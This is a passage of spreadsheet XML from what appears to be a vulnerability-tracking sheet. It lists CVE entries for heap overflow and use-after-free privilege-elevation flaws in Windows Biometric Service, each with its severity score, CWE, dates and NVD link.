        <v>0.003</v>
      </c>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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77" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S677" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="D678" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F678" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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78" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="S678" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="D679" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F679" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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79" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S679" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="D680" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F680" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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0" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S680" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="D681" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F681" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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1" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S681" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="D682" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F682" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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2" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S682" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="D683" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F683" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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3" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S683" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="D684" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F684" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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4" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S684" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="D685" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F685" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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5" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S685" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="D686" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F686" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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6" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S686" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="D687" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F687" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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7" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S687" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="D688" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F688" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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8" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S688" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="D689" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F689" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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89" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S689" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="D690" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F690" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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0" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S690" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="D691" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F691" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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1" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S691" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="D692" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F692" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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2" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
      <c r="R692" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S692" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="D693" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F693" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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3" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S693" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="D694" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F694" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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4" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S694" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
